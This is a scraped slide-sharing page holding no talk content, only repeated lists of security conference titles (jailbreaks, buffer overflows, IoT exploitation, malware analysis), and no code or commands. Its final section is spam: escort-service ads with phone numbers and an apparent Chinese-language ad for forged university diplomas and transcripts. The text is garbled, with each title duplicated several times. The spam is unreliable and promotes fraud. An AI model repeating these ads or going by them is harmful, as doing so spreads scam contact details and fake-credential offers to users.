Nous Sommes Cyber - HTB BlueNous Sommes Cyber - HTB Blue
Nous Sommes Cyber - HTB BlueDianaWhitney4
 
Search for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code AnalysisSearch for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code AnalysisAndrey Karpov
 
OpenStack Discovery and Networking Assurance - Koren Lev - Meetup
OpenStack Discovery and Networking Assurance - Koren Lev - MeetupOpenStack Discovery and Networking Assurance - Koren Lev - Meetup
OpenStack Discovery and Networking Assurance - Koren Lev - MeetupCloud Native Day Tel Aviv
 
One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...
One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...
One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...Priyanka Aash
 
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...Liang Chen
 
Talos: Neutralizing Vulnerabilities with Security Workarounds for Rapid Respo...
Talos: Neutralizing Vulnerabilities with Security Workarounds for Rapid Respo...Talos: Neutralizing Vulnerabilities with Security Workarounds for Rapid Respo...
Talos: Neutralizing Vulnerabilities with Security Workarounds for Rapid Respo...Zhen Huang
 
SCADA Software or Swiss Cheese Software?  by Celil UNUVER
SCADA Software or Swiss Cheese Software?  by Celil UNUVERSCADA Software or Swiss Cheese Software?  by Celil UNUVER
SCADA Software or Swiss Cheese Software?  by Celil UNUVERCODE BLUE
 
Cassandra Day SV 2014: Spark, Shark, and Apache Cassandra
Cassandra Day SV 2014: Spark, Shark, and Apache CassandraCassandra Day SV 2014: Spark, Shark, and Apache Cassandra
Cassandra Day SV 2014: Spark, Shark, and Apache CassandraDataStax Academy
 
Using Asterisk in a SIP softswitch
Using Asterisk in a SIP softswitchUsing Asterisk in a SIP softswitch
Using Asterisk in a SIP softswitchMonica McArthur
 
KARMA: Adaptive Android Kernel Live Patching
KARMA: Adaptive Android Kernel Live PatchingKARMA: Adaptive Android Kernel Live Patching
KARMA: Adaptive Android Kernel Live PatchingYue Chen
 

Similaire à Stunning Guards for iOS Jailbreak (20)

C++ scalable network_io
C++ scalable network_ioC++ scalable network_io
C++ scalable network_io
 
Bh fed-03-kaminsky
Bh fed-03-kaminskyBh fed-03-kaminsky
Bh fed-03-kaminsky
 
SCADA Software or Swiss Cheese Software - CODE BLUE, Japan
SCADA Software or Swiss Cheese Software - CODE BLUE, JapanSCADA Software or Swiss Cheese Software - CODE BLUE, Japan
SCADA Software or Swiss Cheese Software - CODE BLUE, Japan
 
Hacking Blind
Hacking BlindHacking Blind
Hacking Blind
 
Hacking blind
Hacking blindHacking blind
Hacking blind
 
Basic buffer overflow part1
Basic buffer overflow part1Basic buffer overflow part1
Basic buffer overflow part1
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
 
Advanced malwareanalysis training session2 botnet analysis part1
Advanced malwareanalysis training session2 botnet analysis part1Advanced malwareanalysis training session2 botnet analysis part1
Advanced malwareanalysis training session2 botnet analysis part1
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
 
Nous Sommes Cyber - HTB Blue
Nous Sommes Cyber - HTB BlueNous Sommes Cyber - HTB Blue
Nous Sommes Cyber - HTB Blue
 
Search for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code AnalysisSearch for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code Analysis
 
OpenStack Discovery and Networking Assurance - Koren Lev - Meetup
OpenStack Discovery and Networking Assurance - Koren Lev - MeetupOpenStack Discovery and Networking Assurance - Koren Lev - Meetup
OpenStack Discovery and Networking Assurance - Koren Lev - Meetup
 
One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...
One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...
One bite and all your dreams will come true: Analyzing and Attacking Apple Ke...
 
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
 
Talos: Neutralizing Vulnerabilities with Security Workarounds for Rapid Respo...
Talos: Neutralizing Vulnerabilities with Security Workarounds for Rapid Respo...Talos: Neutralizing Vulnerabilities with Security Workarounds for Rapid Respo...
Talos: Neutralizing Vulnerabilities with Security Workarounds for Rapid Respo...
 
SCADA Software or Swiss Cheese Software?  by Celil UNUVER
SCADA Software or Swiss Cheese Software?  by Celil UNUVERSCADA Software or Swiss Cheese Software?  by Celil UNUVER
SCADA Software or Swiss Cheese Software?  by Celil UNUVER
 
Back to the CORE
Back to the COREBack to the CORE
Back to the CORE
 
Cassandra Day SV 2014: Spark, Shark, and Apache Cassandra
Cassandra Day SV 2014: Spark, Shark, and Apache CassandraCassandra Day SV 2014: Spark, Shark, and Apache Cassandra
Cassandra Day SV 2014: Spark, Shark, and Apache Cassandra
 
Using Asterisk in a SIP softswitch
Using Asterisk in a SIP softswitchUsing Asterisk in a SIP softswitch
Using Asterisk in a SIP softswitch
 
KARMA: Adaptive Android Kernel Live Patching
KARMA: Adaptive Android Kernel Live PatchingKARMA: Adaptive Android Kernel Live Patching
KARMA: Adaptive Android Kernel Live Patching
 

Plus de CODE BLUE

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...CODE BLUE
 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten NohlCODE BLUE
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo PupilloCODE BLUE
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫CODE BLUE
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...CODE BLUE
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka CODE BLUE
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...CODE BLUE
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...CODE BLUE
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...CODE BLUE
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...CODE BLUE
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也CODE BLUE
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...CODE BLUE
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...CODE BLUE
 

Plus de CODE BLUE (20)

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
 

Dernier

Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...
Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...
Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...Pooja Nehwal
 
(SANA) Call Girls Landewadi ( 7001035870 ) HI-Fi Pune Escorts Service
(SANA) Call Girls Landewadi ( 7001035870 ) HI-Fi Pune Escorts Service(SANA) Call Girls Landewadi ( 7001035870 ) HI-Fi Pune Escorts Service
(SANA) Call Girls Landewadi ( 7001035870 ) HI-Fi Pune Escorts Serviceranjana rawat
 
WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...
WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...
WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...Pooja Nehwal
 
Call Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur Escorts
Call Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur EscortsCall Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur Escorts
Call Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur EscortsCall Girls in Nagpur High Profile
 
High Profile Call Girls In Andheri 7738631006 Call girls in mumbai Mumbai ...
High Profile Call Girls In Andheri 7738631006 Call girls in mumbai Mumbai ...High Profile Call Girls In Andheri 7738631006 Call girls in mumbai Mumbai ...
High Profile Call Girls In Andheri 7738631006 Call girls in mumbai Mumbai ...Pooja Nehwal
 
(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...
(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...
(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...ranjana rawat
 
VVIP Pune Call Girls Warje (7001035870) Pune Escorts Nearby with Complete Sat...
VVIP Pune Call Girls Warje (7001035870) Pune Escorts Nearby with Complete Sat...VVIP Pune Call Girls Warje (7001035870) Pune Escorts Nearby with Complete Sat...
VVIP Pune Call Girls Warje (7001035870) Pune Escorts Nearby with Complete Sat...Call Girls in Nagpur High Profile
 
(PARI) Alandi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(PARI) Alandi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts(PARI) Alandi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(PARI) Alandi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escortsranjana rawat
 
Dubai Call Girls O528786472 Call Girls In Dubai Wisteria
Dubai Call Girls O528786472 Call Girls In Dubai WisteriaDubai Call Girls O528786472 Call Girls In Dubai Wisteria
Dubai Call Girls O528786472 Call Girls In Dubai WisteriaUnited Arab Emirates
 
(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...ranjana rawat
 
如何办理(Adelaide毕业证)阿德莱德大学毕业证成绩单Adelaide学历认证真实可查
如何办理(Adelaide毕业证)阿德莱德大学毕业证成绩单Adelaide学历认证真实可查如何办理(Adelaide毕业证)阿德莱德大学毕业证成绩单Adelaide学历认证真实可查
如何办理(Adelaide毕业证)阿德莱德大学毕业证成绩单Adelaide学历认证真实可查awo24iot
 
FULL ENJOY - 8264348440 Call Girls in Hauz Khas | Delhi
FULL ENJOY - 8264348440 Call Girls in Hauz Khas | DelhiFULL ENJOY - 8264348440 Call Girls in Hauz Khas | Delhi
FULL ENJOY - 8264348440 Call Girls in Hauz Khas | Delhisoniya singh
 
Makarba ( Call Girls ) Ahmedabad ✔ 6297143586 ✔ Hot Model With Sexy Bhabi Rea...
Makarba ( Call Girls ) Ahmedabad ✔ 6297143586 ✔ Hot Model With Sexy Bhabi Rea...Makarba ( Call Girls ) Ahmedabad ✔ 6297143586 ✔ Hot Model With Sexy Bhabi Rea...
Makarba ( Call Girls ) Ahmedabad ✔ 6297143586 ✔ Hot Model With Sexy Bhabi Rea...Naicy mandal
 
Top Rated Pune Call Girls Ravet ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Ravet ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...Top Rated Pune Call Girls Ravet ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Ravet ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...Call Girls in Nagpur High Profile
 
9004554577, Get Adorable Call Girls service. Book call girls & escort service...
9004554577, Get Adorable Call Girls service. Book call girls & escort service...9004554577, Get Adorable Call Girls service. Book call girls & escort service...
9004554577, Get Adorable Call Girls service. Book call girls & escort service...Pooja Nehwal
 
Top Rated Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...
Top Rated Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...Top Rated Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...
Top Rated Pune Call Girls Katraj ⟟ 6297143586 ⟟ Call Me For Genuine Sex Serv...Call Girls in Nagpur High Profile
 
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,Pooja Nehwal
 

Dernier (20)

Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...
Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...
Call Girls in Thane 9892124323, Vashi cAll girls Serivces Juhu Escorts, powai...
 
(SANA) Call Girls Landewadi ( 7001035870 ) HI-Fi Pune Escorts Service
(SANA) Call Girls Landewadi ( 7001035870 ) HI-Fi Pune Escorts Service(SANA) Call Girls Landewadi ( 7001035870 ) HI-Fi Pune Escorts Service
(SANA) Call Girls Landewadi ( 7001035870 ) HI-Fi Pune Escorts Service
 
🔝 9953056974🔝 Delhi Call Girls in Ajmeri Gate
🔝 9953056974🔝 Delhi Call Girls in Ajmeri Gate🔝 9953056974🔝 Delhi Call Girls in Ajmeri Gate
🔝 9953056974🔝 Delhi Call Girls in Ajmeri Gate
 
WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...
WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...
WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...
 
Call Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur Escorts
Call Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur EscortsCall Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur Escorts
Call Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur Escorts
 
Call Girls In Vaishali 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In Vaishali 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICECall Girls In Vaishali 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In Vaishali 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
 
High Profile Call Girls In Andheri 7738631006 Call girls in mumbai Mumbai ...
High Profile Call Girls In Andheri 7738631006 Call girls in mumbai Mumbai ...High Profile Call Girls In Andheri 7738631006 Call girls in mumbai Mumbai ...
High Profile Call Girls In Andheri 7738631006 Call girls in mumbai Mumbai ...
 
(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...
(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...
(MEGHA) Hinjewadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune E...
 
VVIP Pune Call Girls Warje (7001035870) Pune Escorts Nearby with Complete Sat...
VVIP Pune Call Girls Warje (7001035870) Pune Escorts Nearby with Complete Sat...VVIP Pune Call Girls Warje (7001035870) Pune Escorts Nearby with Complete Sat...
VVIP Pune Call Girls Warje (7001035870) Pune Escorts Nearby with Complete Sat...
 
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
 
(PARI) Alandi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(PARI) Alandi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts(PARI) Alandi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(PARI) Alandi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
 
Dubai Call Girls O528786472 Call Girls In Dubai Wisteria
Dubai Call Girls O528786472 Call Girls In Dubai WisteriaDubai Call Girls O528786472 Call Girls In Dubai Wisteria
Dubai Call Girls O528786472 Call Girls In Dubai Wisteria
 
(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(ANIKA) Wanwadi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
 
如何办理(Adelaide毕业证)阿德莱德大学毕业证成绩单Adelaide学历认证真实可查
